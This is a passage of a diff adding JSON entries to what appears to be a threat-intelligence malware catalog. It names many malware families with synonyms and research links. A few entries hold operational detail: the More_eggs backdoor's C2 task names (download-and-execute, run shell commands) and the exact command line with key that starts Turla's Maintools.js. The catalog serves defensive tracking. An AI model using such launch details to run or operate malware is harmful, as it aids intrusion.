"http://www.certego.net/en/news/nearly-undetectable-qarallax-rat-spreading-via-spam/" + ] + }, + "uuid": "e7852eb9-9de9-43d3-9f7e-3821f3b2bf41", + "value": "Qarallax RAT", + "description": "According to SpiderLabs, in May 2015 the \"company\" Quaverse offered a RAT known as Quaverse RAT or QRAT. At around May 2016, this QRAT evolved into another RAT which became known as Qarallax RAT, because its C2 is at qarallax.com. Quaverse also offers a service to encrypt Java payloads (Qrypter), and thus qrypted payloads are sometimes confused with Quaverse RATs (QRAT / Qarallax RAT)." + }, + { + "meta": { + "synonyms": [ + "Quaverse RAT" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/jar.qrat", + "https://www.trustwave.com/Resources/SpiderLabs-Blog/Quaverse-RAT--Remote-Access-as-a-Service/", + "https://www.digitrustgroup.com/java-rat-qrat/", + "https://blogs.forcepoint.com/security-labs/look-qrypter-adwind%E2%80%99s-major-rival-cross-platform-maas-market" + ] + }, + "uuid": "ef385825-bfa1-4e8c-b368-522db78cf1bd", + "value": "QRat", + "description": "QRat, also known as Quaverse RAT, was introduced in May 2015 as undetectable (because of multiple layers of obfuscation). It offers the usual functionality (password dumper, file browser, keylogger, screen shots/streaming, ...), and it comes as a SaaS. For additional historical context, please see jar.qarallax." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/jar.ratty", + "https://github.com/shotskeber/Ratty" + ] + }, + "uuid": "da032a95-b02a-4af2-b563-69f686653af4", + "value": "Ratty", + "description": "Ratty is an open source Java RAT, made available on GitHub and promoted heavily on HackForums. At some point in 2016 / 2017 the original author deleted his repository, but several clones exist." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.airbreak", + "https://www.fireeye.com/blog/threat-research/2018/07/chinese-espionage-group-targets-cambodia-ahead-of-elections.html" + ] + }, + "uuid": "fd419da6-5c0d-461e-96ee-64397efac63b", + "value": "AIRBREAK", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.bateleur", + "https://www.proofpoint.com/us/threat-insight/post/fin7carbanak-threat-actor-unleashes-bateleur-jscript-backdoor" + ] + }, + "uuid": "fb75a753-24ba-4b58-b7ed-2e39b0c68c65", + "value": "Bateleur", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.cryptonight", + "https://gist.github.com/JohnLaTwC/112483eb9aed27dd2184966711c722ec", + "https://twitter.com/JohnLaTwC/status/983011262731714565" + ] + }, + "uuid": "faa19699-a884-4cd3-a307-36492c8ee77a", + "value": "CryptoNight", + "description": "WebAssembly-based crpyto miner." + }, + { + "meta": { + "synonyms": [ + "Roblox Trade Assist" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.cukiegrab_crx", + "http://blog.trendmicro.com/trendlabs-security-intelligence/malicous-chrome-extensions-stealing-roblox-game-currency-sending-cookies-via-discord/" + ] + }, + "uuid": "d47ca107-3e03-4c25-88f9-8156426b7f60", + "value": "CukieGrab", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.kopiluwak", + "https://securelist.com/blog/research/77429/kopiluwak-a-new-javascript-payload-from-turla/", + "https://www.proofpoint.com/us/threat-insight/post/turla-apt-actor-refreshes-kopiluwak-javascript-backdoor-use-g20-themed-attack" + ] + }, + "uuid": "2269d37b-87e9-460d-b878-b74a2f4c3537", + "value": "KopiLuwak", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.magecart", + "https://www.riskiq.com/blog/labs/magecart-ticketmaster-breach/" + ] + }, + "uuid": "f53e404b-0dcd-4116-91dd-cad94fc41936", + "value": "magecart", + "description": "" + }, + { + "meta": { + "synonyms": [ + "SpicyOmelette" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.more_eggs", + "https://blog.trendmicro.com/trendlabs-security-intelligence/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses/", + "https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/", + "https://www.secureworks.com/blog/cybercriminals-increasingly-trying-to-ensnare-the-big-financial-fish", + "https://blog.trendmicro.com/trendlabs-security-intelligence/cobalt-spam-runs-use-macros-cve-2017-8759-exploit/", + "https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html", + "https://asert.arbornetworks.com/double-the-infection-double-the-fun/", + "https://blog.morphisec.com/cobalt-gang-2.0" + ] + }, + "uuid": "1c3009ff-b9a5-4ac1-859c-9b3b4a66a63f", + "value": "More_eggs", + "description": "More_eggs is a JavaScript backdoor used by the Cobalt group. It attempts to connect to its C&C server and retrieve tasks to carry out, some of which are:\r\n- d&exec = download and execute PE file\r\n- gtfo = delete files/startup entries and terminate\r\n- more_eggs = download additional/new scripts\r\n- more_onion = run new script and terminate current script\r\n- more_power = run command shell commands" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.powmet", + "http://blog.trendmicro.com/trendlabs-security-intelligence/look-js_powmet-completely-fileless-malware/" + ] + }, + "uuid": "9521ceb0-039d-412c-a38b-7bd9ddfc772e", + "value": "Powmet", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.scanbox", + "https://www.alienvault.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks", + "http://resources.infosecinstitute.com/scanbox-framework/" + ] + }, + "uuid": "0a13a546-91a2-4de0-9bbb-71c9233ce6fa", + "value": "scanbox", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.turla_ff_ext", + "https://www.welivesecurity.com/2017/06/06/turlas-watering-hole-campaign-updated-firefox-extension-abusing-instagram/" + ] + }, + "uuid": "c7ab9e5a-0ec9-481e-95ec-ad08f06cf985", + "value": "HTML5 Encoding", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.turla_maintools", + "https://twitter.com/JohnLaTwC/status/915590893155098629" + ] + }, + "uuid": "218f8ca8-1124-4e44-8fbd-4b05b46bde4b", + "value": "Maintools.js", + "description": "Expects a parameter to run: needs to be started as 'maintools.js EzZETcSXyKAdF_e5I2i1'." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.unidentified_050", + "https://gist.github.com/9b/141a5c7ab8b4280901722e2cd931b7ef", + "https://community.riskiq.com/projects/53b4bd1e-dad0-306b-7712-d2a608400c8f" + ] + }, + "uuid": "f2b0ffdc-7d4e-4786-8935-e7036faa174d", + "value": "Unidentified 050 (APT32 Profiler)", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.witchcoven", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt-witchcoven.pdf" + ] + }, + "uuid": "dcc0fad2-29a9-4b69-9d75-d288ca458bc7", + "value": "witchcoven", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.bella", + "https://blog.malwarebytes.com/threat-analysis/2017/05/another-osx-dok-dropper-found-installing-new-backdoor/", + "https://github.com/kai5263499/Bella", + "https://github.com/kai5263499/Bella" + ] + }, + "uuid": "3c5036ad-2afc-4bc1-a5a3-b31797f46248", + "value": "Bella", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Mask", + "Appetite" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.careto", + "https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed" + ] + }, + "uuid": "dcabea75-a433-4157-bb7a-be76de3026ac", + "value": "Careto", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.cointhief", + "https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed" + ] + }, + "uuid": "70e73da7-21d3-4bd6-9a0e-0c904e6457e8", + "value": "CoinThief", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.coldroot_rat", + "https://objective-see.com/blog/blog_0x2A.html" + ] + }, + "uuid": "076a7ae0-f4b8-45c7-9de4-dc9cc7e54bcf", + "value": "Coldroot RAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.cpumeaner", + "https://www.sentinelone.com/blog/osx-cpumeaner-miner-trojan-software-pirates/" + ] + }, + "uuid": "74360d1e-8f85-44d1-8ce7-e76afb652142", + "value": "CpuMeaner", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.creative_updater", + "https://blog.malwarebytes.com/threat-analysis/2018/02/new-mac-cryptominer-distributed-via-a-macupdate-hack/", + "https://digitasecurity.com/blog/2018/02/05/creativeupdater/", + "https://objective-see.com/blog/blog_0x29.html" + ] + }, + "uuid": "40fc6f71-75ac-43ac-abd9-c90b0e847999", + "value": "CreativeUpdater", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.crisis", + "http://contagiodump.blogspot.com/2012/12/aug-2012-w32crisis-and-osxcrisis-jar.html", + "https://www.symantec.com/connect/blogs/crisis-windows-sneaks-virtual-machines", + "https://www.intego.com/mac-security-blog/new-apple-mac-trojan-called-osxcrisis-discovered-by-intego-virus-team/?" + ] + }, + "uuid": "4b2ab902-811e-4b50-8510-43454d77d027", + "value": "Crisis", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.crossrider", + "https://blog.malwarebytes.com/threat-analysis/2018/04/new-crossrider-variant-installs-configuration-profiles-on-macs/?utm_source=twitter&utm_medium=social" + ] + }, + "uuid": "05ddb459-5a2f-44d5-a135-ed3f1e772302", + "value": "Crossrider", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.dockster", + "http://contagiodump.blogspot.com/2012/12/osxdockstera-and-win32trojanagentaxmo.html", + "https://www.f-secure.com/weblog/archives/00002466.html" + ] + }, + "uuid": "713d8ec4-4983-4fbb-827c-2ef5bc0e6930", + "value": "Dockster", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.dummy", + "https://objective-see.com/blog/blog_0x32.html" + ] + }, + "uuid": "cbf9ff89-d35b-4954-8873-32f59f5e4d7d", + "value": "Dummy", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.evilosx", + "https://github.com/Marten4n6/EvilOSX", + "https://twitter.com/JohnLaTwC/status/966139336436498432" + ] + }, + "uuid": "24f3d8e1-3936-4664-b813-74c797b87d9d", + "value": "EvilOSX", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.flashback", + "https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed", + "http://contagiodump.blogspot.com/2012/04/osxflashbacko-sample-some-domains.html", + "http://contagiodump.blogspot.com/2012/04/osxflashbackk-sample-mac-os-malware.html" + ] + }, + "uuid": "f92b5355-f398-4f09-8bcc-e06df6fe51a0", + "value": "FlashBack", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Quimitchin" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.fruitfly", + "https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/", + "https://arstechnica.com/security/2017/01/newly-discovered-mac-malware-may-have-circulated-in-the-wild-for-2-years/", + "https://arstechnica.com/security/2017/07/perverse-malware-infecting-hundreds-of-macs-remained-undetected-for-years/", + "https://www.virusbulletin.com/virusbulletin/2017/11/vb2017-paper-offensive-malware-analysis-dissecting-osxfruitflyb-custom-cc-server/", + "https://www.documentcloud.org/documents/4346338-Phillip-Durachinsky-Indictment.html", + "https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Patrick-Wardle-Offensive-Malware-Analysis-Fruit-Fly-UPDATED..pdf" + ] + }, + "uuid": "a517cdd1-6c82-4b29-bdd2-87e281227597", + "value": "FruitFly", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.hiddenlotus", + "https://blog.malwarebytes.com/threat-analysis/2017/12/interesting-disguise-employed-by-new-mac-malware/" + ] + }, + "uuid": "fc17e41f-e9f7-4442-a05c-7a19b9174c39", + "value": "HiddenLotus", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Revir" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.imuler", + "http://contagiodump.blogspot.com/2012/11/group-photoszip-osxrevir-osximuler.html", + "https://nakedsecurity.sophos.com/2012/11/13/new-mac-trojan/" + ] + }, + "uuid": "261fd543-60e4-470f-af28-7a9b17ba4759", + "value": "iMuler", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.keranger", + "https://objective-see.com/blog/blog_0x16.html", + "http://researchcenter.paloaltonetworks.com/2016/03/new-os-x-ransomware-keranger-infected-transmission-bittorrent-client-installer/", + "https://www.macworld.com/article/3234650/macs/keranger-the-first-in-the-wild-ransomware-for-macs-but-certainly-not-the-last.html" + ] + }, + "uuid": "01643bc9-bd61-42e8-b9f1-5fbf83dcd786", + "value": "KeRanger", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.keydnap", + "https://objective-see.com/blog/blog_0x16.html", + "http://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/", + "https://github.com/eset/malware-ioc/tree/master/keydnap" + ] + }, + "uuid": "2173605b-bf44-4c76-b75a-09c53bb322d6", + "value": "Keydnap", + "description": "" + }, + { + "meta": { + "synonyms": [ + "KitM" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.kitmos", + "https://www.f-secure.com/weblog/archives/00002558.html" + ] + }, + "uuid": "8a1b1c99-c149-4339-9058-db3b4084cdcd", + "value": "Kitmos", + "description": "" + }, + { + "meta": { + "synonyms": [ + "SedUploader", + "JHUHUGIT", + "JKEYSKW" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.komplex", + "http://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/", + "https://objective-see.com/blog/blog_0x16.html", + "https://blog.malwarebytes.com/threat-analysis/2016/09/komplex-mac-backdoor-answers-old-questions/", + "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", + "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part1.pdf" + ] + }, + "uuid": "d26b5518-8d7f-41a6-b539-231e4962853e", + "value": "Komplex", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.laoshu", + "https://objective-see.com/blog/blog_0x16.html", + "https://nakedsecurity.sophos.com/2014/01/21/data-stealing-malware-targets-mac-users-in-undelivered-courier-item-attack/" + ] + }, + "uuid": "a13a2cb8-b0e6-483a-9916-f44969a2c42b", + "value": "Laoshu", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.leverage", + "https://www.volexity.com/blog/2017/07/24/real-news-fake-flash-mac-os-x-users-targeted/", + "https://www.alienvault.com/blogs/labs-research/osx-leveragea-analysis" + ] + }, + "uuid": "15daa766-f721-4fd5-95fb-153f5361fb87", + "value": "Leverage", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.macdownloader", + "https://iranthreats.github.io/resources/macdownloader-macos-malware/" + ] + }, + "uuid": "910d3c78-1a9e-4600-a3ea-4aa5563f0f13", + "value": "MacDownloader", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.macinstaller", + "https://objective-see.com/blog/blog_0x16.html" + ] + }, + "uuid": "d1f8af3c-719b-4f64-961b-8d89a2defa02", + "value": "MacInstaller", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.macransom", + "https://blog.fortinet.com/2017/06/09/macransom-offered-as-ransomware-as-a-service", + "https://objective-see.com/blog/blog_0x1E.html" + ] + }, + "uuid": "66862f1a-5823-4a9a-bd80-439aaafc1d8b", + "value": "MacRansom", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.macspy", + "https://www.alienvault.com/blogs/labs-research/macspy-os-x-rat-as-a-service" + ] + }, + "uuid": "c9915d41-d1fb-45bc-997e-5cd9c573d8e7", + "value": "MacSpy", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.macvx", + "https://objective-see.com/blog/blog_0x16.html" + ] + }, + "uuid": "4db9012b-d3a1-4f19-935c-4dbc7fdd93fe", + "value": "MacVX", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.mami", + "https://objective-see.com/blog/blog_0x26.html" + ] + }, + "uuid": "7759534c-3298-42e9-adab-896d7e507f4f", + "value": "MaMi", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.mokes", + "https://objective-see.com/blog/blog_0x16.html", + "https://securelist.com/blog/research/75990/the-missing-piece-sophisticated-os-x-backdoor-discovered/" + ] + }, + "uuid": "6d5a5357-4126-4950-b8c3-ee78b1172217", + "value": "Mokes", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.mughthesec", + "https://objective-see.com/blog/blog_0x20.html" + ] + }, + "uuid": "aa1bf4e5-9c44-42a2-84e5-7526e4349405", + "value": "Mughthesec", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.oceanlotus", + "https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update", + "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", + "https://researchcenter.paloaltonetworks.com/2017/06/unit42-new-improved-macos-backdoor-oceanlotus/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-backdoor-linked-to-oceanlotus-found/" + ] + }, + "uuid": "65b7eff4-741c-445e-b4e0-8a4e4f673a65", + "value": "OceanLotus", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.olyx", + "http://contagiodump.blogspot.com/2011/07/jul-25-mac-olyx-gh0st-backdoor-in-rar.html", + "https://news.drweb.com/show/?i=1750&lng=en&c=14" + ] + }, + "uuid": "cd397973-8f42-4c49-8322-414ea77ec773", + "value": "Olyx", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Findzip" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.patcher", + "http://www.welivesecurity.com/2017/02/22/new-crypto-ransomware-hits-macos/" + ] + }, + "uuid": "bad1057c-4f92-4747-a0ec-31bcc062dab8", + "value": "Patcher", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.pirrit", + "http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf", + "http://www.zdnet.com/article/maker-of-sneaky-mac-adware-sends-security-researcher-cease-and-desist-letter/" + ] + }, + "uuid": "b749ff3a-df68-4b38-91f1-649864eae52c", + "value": "Pirrit", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Calisto" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.proton_rat", + "https://www.cybereason.com/labs-blog/labs-proton-b-what-this-mac-malware-actually-does", + "https://blog.malwarebytes.com/threat-analysis/mac-threat-analysis/2017/11/osx-proton-spreading-through-fake-symantec-blog/", + "https://objective-see.com/blog/blog_0x1D.html", + "https://securelist.com/calisto-trojan-for-macos/86543/", + "https://threatpost.com/handbrake-for-mac-compromised-with-proton-spyware/125518/", + "https://objective-see.com/blog/blog_0x1F.html", + "https://www.welivesecurity.com/2017/10/20/osx-proton-supply-chain-attack-elmedia/", + "https://www.hackread.com/hackers-selling-undetectable-proton-mac-malware/", + "https://www.cybersixgill.com/wp-content/uploads/2017/02/02072017%20-%20Proton%20-%20A%20New%20MAC%20OS%20RAT%20-%20Sixgill%20Threat%20Report.pdf" + ] + }, + "uuid": "d7e31f19-8bf2-4def-8761-6c5bf7feaa44", + "value": "Proton RAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.pwnet", + "https://sentinelone.com/blog/osx-pwnet-a-csgo-hack-and-sneaky-miner/" + ] + }, + "uuid": "70059ec2-9315-4af7-b65b-2ec35676a7bb", + "value": "Pwnet", + "description": "Cryptocurrency miner that was distributed masquerading as a Counter-Strike: Global Offensive hack." + }, + { + "meta": { + "synonyms": [ + "Retefe" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.retefe", + "http://blog.checkpoint.com/2017/04/27/osx-malware-catching-wants-read-https-traffic/", + "http://www.brycampbell.co.uk/new-blog/2017/4/30/retefe-and-osxdok-one-and-the-same", + "https://blog.checkpoint.com/2017/07/13/osxdok-refuses-go-away-money/", + "https://www.govcert.admin.ch/blog/33/the-retefe-saga" + ] + }, + "uuid": "80acc956-d418-42e3-bddf-078695a01289", + "value": "Dok", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.systemd", + "https://vms.drweb.com/virus/?_is=1&i=15299312&lng=en" + ] + }, + "uuid": "a8e7687b-9db7-4606-ba81-320d36099e3a", + "value": "systemd", + "description": "General purpose backdoor" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.uroburos", + "https://blog.fox-it.com/2017/05/03/snake-coming-soon-in-mac-os-x-flavour/", + "https://blog.malwarebytes.com/threat-analysis/2017/05/snake-malware-ported-windows-mac/" + ] + }, + "uuid": "d674ffd2-1f27-403b-8fe9-b4af6e303e5c", + "value": "Uroburos", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.winnti", + " https://401trg.pw/an-update-on-winnti/", + "https://401trg.pw/winnti-evolution-going-open-source/" + ] + }, + "uuid": "7f8166e2-c7f4-4b48-a07b-681b61a8f2c1", + "value": "Winnti", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.wirelurker", + "https://objective-see.com/blog/blog_0x16.html", + "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf" + ] + }, + "uuid": "bc32df24-8e80-44bc-80b0-6a4d55661aa5", + "value": "WireLurker", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.wirenet", + "http://contagiodump.blogspot.com/2012/12/aug-2012-backdoorwirenet-osx-and-linux.html", + "https://news.drweb.com/show/?i=2679&lng=en&c=14" + ] + }, + "uuid": "47a8fedb-fd60-493a-9b7d-082bdb85621e", + "value": "Wirenet", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.xagent", + "https://twitter.com/PhysicalDrive0/status/845009226388918273", + "https://download.bitdefender.com/resources/files/News/CaseStudies/study/143/Bitdefender-Whitepaper-APT-Mac-A4-en-EN-web.pdf", + "http://researchcenter.paloaltonetworks.com/2017/02/unit42-xagentosx-sofacys-xagent-macos-tool/" + ] + }, + "uuid": "0a7d9d22-a26d-4a2b-ab9b-b296176c3ecf", + "value": "X-Agent", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.xslcmd", + "https://objective-see.com/blog/blog_0x16.html" + ] + }, + "uuid": "120a5890-dc3e-42e8-950e-b5ff9a849d2a", + "value": "XSLCmd", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/php.pas", + "https://www.us-cert.gov/security-publications/GRIZZLY-STEPPE-Russian-Malicious-Cyber-Activity", + "https://blog.erratasec.com/2016/12/some-notes-on-iocs.html" + ] + }, + "uuid": "e6a40fa2-f79f-40e9-89d3-a56984bc51f7", + "value": "PAS", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Webshell by Orb" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/php.wso", + "https://github.com/wso-shell", + "https://securelist.com/energetic-bear-crouching-yeti/85345/" + ] + }, + "uuid": "7f3794fc-662e-4dde-b793-49bcaccc96f7", + "value": "WSO", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/pl.silence_ddos", + "https://www.group-ib.com/resources/threat-research/silence.html" + ] + }, + "uuid": "b5cc7a39-305b-487e-b15a-02dcebefce90", + "value": "Silence DDoS", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.bondupdater", + "https://www.boozallen.com/s/insight/blog/dark-labs-discovers-apt34-malware-variants.html?cid=spo-csatb-2" + ] + }, + "uuid": "99600ba5-30a0-4ac8-8583-6288760b77c3", + "value": "BONDUPDATER", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.ghostminer", + "https://blog.minerva-labs.com/ghostminer-cryptomining-malware-goes-fileless" + ] + }, + "uuid": "0db05333-2214-49c3-b469-927788932aaa", + "value": "GhostMiner", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.poshspy", + "https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html", + "https://github.com/matthewdunwoody/POSHSPY" + ] + }, + "uuid": "4df1b257-c242-46b0-b120-591430066b6f", + "value": "POSHSPY", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerware", + "https://blog.cylance.com/ransomware-update-todays-bountiful-cornucopia-of-extortive-threats" + ] + }, + "uuid": "5c5beab9-614c-4c86-b369-086234ddb43c", + "value": "PowerWare", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powruner", + "https://www.boozallen.com/s/insight/blog/dark-labs-discovers-apt34-malware-variants.html?cid=spo-csatb-2" + ] + }, + "uuid": "63f6df51-4de3-495a-864f-0a7e30c3b419", + "value": "POWRUNER", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.quadagent", + "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.ez428aw98bca" + ] + }, + "uuid": "e27bfd65-4a58-416a-b03a-1ab1703edb24", + "value": "QUADAGENT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.roguerobin", + "https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/", + "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.ez428aw98bca" + ] + }, + "uuid": "1e27a569-1899-4f6f-8c42-aa91bf0a539d", + "value": "RogueRobin", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.tater", + "https://github.com/Kevin-Robertson/Tater" + ] + 